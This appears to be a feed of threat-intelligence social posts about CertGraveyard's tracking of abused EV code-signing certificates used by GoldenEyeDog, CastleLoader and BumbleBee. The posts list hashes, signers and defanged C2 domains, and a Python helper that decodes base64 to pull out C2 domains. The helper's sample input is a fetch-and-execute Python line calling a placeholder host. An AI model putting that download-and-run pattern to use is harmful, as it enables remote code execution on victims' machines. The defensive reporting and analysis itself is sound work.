Use CertGraveyard.org to get a list of hashes for the 69 ZhongStealer hashes.
When we come to understand how they are obtaining the certificates, we'll share here.
Until then, we'll continue working with the CA to mitigate the harm.
7/7
Posts by Squiblydoo
If you want a more in-depth analysis and indicators, Claude and I have been cooking:
First stage analysis: github.com/Squiblydo...
Second stage: github.com/Squiblydo...
We have a directory of other Zhong Stealer analysis, tools, WIP bot emulator: github.com/Squiblydo...
6/7
One recent first stage was signed "Xiamen Xianghe Information Technology Co., Ltd."
The second stage consists of the following:
NvBackend.exe used the leaked 2018 Nvidia cert.
detoured.dll was the Lenovo signed binary.
NvBackend.log is a shellcode loader
5/7
The name Zhong Stealer seems to be a misnomer. Based on my analysis, it seems to be a RAT.
They send a fake image/screenshot in a phishing email.
When run by a user, it displays a JPEG of an error, and pulls down the second stage from a CDN like AWS.
4/7
These certificates are unlike the other 2,100 we've tracked.
They are new certificates issued to existing customers and only used to sign malware. To be clear, they aren't supply chain poisoning.
We've seen 12 issued like this, 69 for this same malware: Zhong Stealer
3/7
First things:
Each of these was mitigated.
The issuing Cert Authorities were quick to act when notified.
No, I don't understand how these are getting issued and abused. GoldenEyeDog seems to have unrestrained ability to create them.
There may be unknown ones.
2/7
What do Lenovo, Kingston, Shuttle Inc, and Palit Microsystems have in common?
EV Certificates from these companies were issued and used by a Chinese crime group, #GoldenEyeDog (#APT-Q-27)!
Thanks @malwrhunterteam and @g0njxa for your contributions
1/7
VirusTotal's maximum size is 650MB; potential victims can't upload it there.
The certificate has been reported and revoked.
A subcomponent of the file was uploaded to VirusTotal: b531ee0e453c6a514daa09a4e7d6e8fae8f433269afba59035d84e68a5ff42a2.
MB: bazaar.abuse.ch/samp...
2/2
AnchorWallet[.]org is fake. The real place to download the wallet is Greymass[.]com.
If you download the Windows app from the fake, you get a 680MB remote access tool signed by PIXEL PLAY PRIVATE LIMITED. Not an app signed by Greymass.
h/t @malwrhunterteam
1/2
There is garbage text and then some Python.
Highlight the base64. Right-click -> Transform. CyberChef-like interface; base64 decode, change text encoding.
"Open in New file" lets us open it in a separate analysis. There's our C2: fillenmore[.]com
bazaar.abuse.ch/samp...
3/3
Opening it up in malcat, we can see it identified the compressed Nullsoft Installer bits (Image 1).
Double-clicking unpacks it. We then have new files to look at. A few are .txt files; we can double-click to open them. This first one actually happens to be what we want.
2/3
FUD CastleLoader signed "INFOTECK SOLUTIONS PRIVATE LIMITED"
The 40MB exe makes it hard for detection engines to see the 1 important line of python it will execute. Short #malcat investigation though.
62a6e64a7233f4a756d01c54840ff703a620a416929d57eebc0bdac3b9ed2019
1/3
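The decode step from the 3/3 post above (find the base64 blob in an extracted NSIS .txt file, decode it, try another text encoding, pull the C2 domain out defanged), as an added Python example; this is not Squiblydoo's or malcat's code, and the sample text and placeholder domain are constructed.

```python
import base64
import re

# Constructed stand-in for the extracted .txt: junk text around a base64 blob
# that decodes to one line of Python (UTF-16-LE, with a placeholder domain).
_PAYLOAD = 'import urllib.request as u;exec(u.urlopen("http://c2-placeholder.invalid/s").read())'
SAMPLE_TXT = (
    "x9!!kq garbage header z\n"
    + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
    + "\nmore garbage"
)

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # runs long enough to matter
PY_HINTS = ("import ", "exec(", "urlopen", "subprocess")
DOMAIN = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def _looks_text(s):
    """True when every char is printable or ordinary whitespace (no NULs)."""
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_candidates(text):
    """Yield (decoded_str, encoding) for each base64 run that decodes to clean text."""
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        # The "change text encoding" step: UTF-8 of UTF-16 bytes is full of NULs,
        # so the UTF-8 attempt is rejected and UTF-16-LE is tried next.
        for enc in ("utf-8", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_text(s):
                yield s, enc
                break


def find_python_c2(text):
    """Return defanged domains from decoded blobs that look like Python."""
    found = []
    for s, _enc in decode_candidates(text):
        if any(h in s for h in PY_HINTS):
            found.extend(d.replace(".", "[.]") for d in DOMAIN.findall(s))
    return found
```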
When I clicked on the "Bluesky Issues" trending link earlier today, every account in the first few scrolldowns was reposting the exact same text blaming the problem on AI. Each account was clearly inauthentic and was advertising video game material in its profile.
The full report can be found here and is well worth the read. research.cert.orange...
2/2
Orange Cyberdefense recently published their research on SmokedHam. We're glad to see Cert Graveyard and the code-signing certs mentioned.
While CertGraveyard tracks the campaigns, we can't investigate them to their full depth (due to capacity), so this is great to see.
1/2
I don't know how to feel about this domain: maybedontbanplease[.]com
What to do? Chat, can you help me out?
(CastleLoader
4ba0d3ae41a0ae3143e8c2c3307c24b0d548593f97c79a30c0387b3d62504c31 signed "SERPENTINE SOLAR LIMITED"
NSIS -> Python execution -> loads remote resource)
These are just a small subset of what we track. Over time, we've tracked 91 certificates we associate with Golden Eye Dog, signing both Zhong Stealer and ValleyRAT.
You can get the whole list of certs from CertGraveyard's lookup page.
4/4
These are the signers we've reported in April:
Xiamen Liuyong Information Technology Co., Ltd.
Xiamen Dahonghuo Technology Co., Ltd.
Beijing 263 Enterprise Correspondence Co., Ltd.
MobSoft Co., Ltd
深圳市优品投资顾问有限公司
Brunner Informatik AG
3/4
The main malware we're seeing via CertGraveyard is tracked as Zhong Stealer.
They host the 2nd stage on a legitimate CDN; one of the files they host is a picture of a 505 error, which is used as a decoy.
2/4
Golden Eye Dog (APT-Q-27) seems to have come back from break.
We've seen 6 unique EV code-signing certs for campaigns in April already.
All of these get reported and all get revoked.
More about them in the thread.
h/t @g0njxa, @malwrhunterteam
1/4
Special thanks @abuse_ch for making MalwareBazaar available, so that we can easily find signed malware.
Thank you official partners for your support and tools:
@unpacme
Malcat dev
@magicswordio
3/3
This post gives a broad overview of CertGraveyard's mission and the tools we use, how you can get involved, and how you can leverage our data for your own cyber defense:
squiblydoo.blog/2026...
2/3
The CertGraveyard was created in 2025, but never received a proper introduction.
We track abused code-signing certificates.
When I created the site, we had 600 entries and now we have 2,250.
See the blogpost below for a full overview.
1/3
The history of BumbleBee's relationship with certificates can be viewed a few ways with CertGraveyard. You can review via a table, a graph, or download the whole database to transform the data yourself.
4/4
This was a great example of why CertGraveyard exists: we were able to document and observe the pattern, allowing us to report the certificate, causing Windows to not trust it as soon as the campaign started.
We're always looking for more people to get involved. Interested?
3/4
If you missed it, NovaViewer was previously signed by "Xiamen Xisu Technology Co., Ltd.". The cert was then used to sign BumbleBee, disguised as "Azure-CLI.msi".
The latest BumbleBee was disguised as an NX Witness installer:
6d6a861c133ff3e1aa09c8744de52413
2/4
We saw NovaViewer being signed with a new EV certificate "Xiamen Duohanbeiwei Network Co., Ltd". This certificate was reported and revoked before the certificate was used in a BumbleBee campaign.
6d6a861c133ff3e1aa09c8744de52413
Special thanks to @luke92881 and @g0njxa
1/4
NEW: Yes, ICE can lie to you and to other law enforcement—and they've been doing it for decades. @telliotter.bsky.social reports: www.wired.com/story/why-ic...
Our database is one of the blocklists used by MagicSword.
Files with certificates issued to cybercriminals are actually stopped from impacting systems: whether the cert provider revokes the certificate or not.
6/6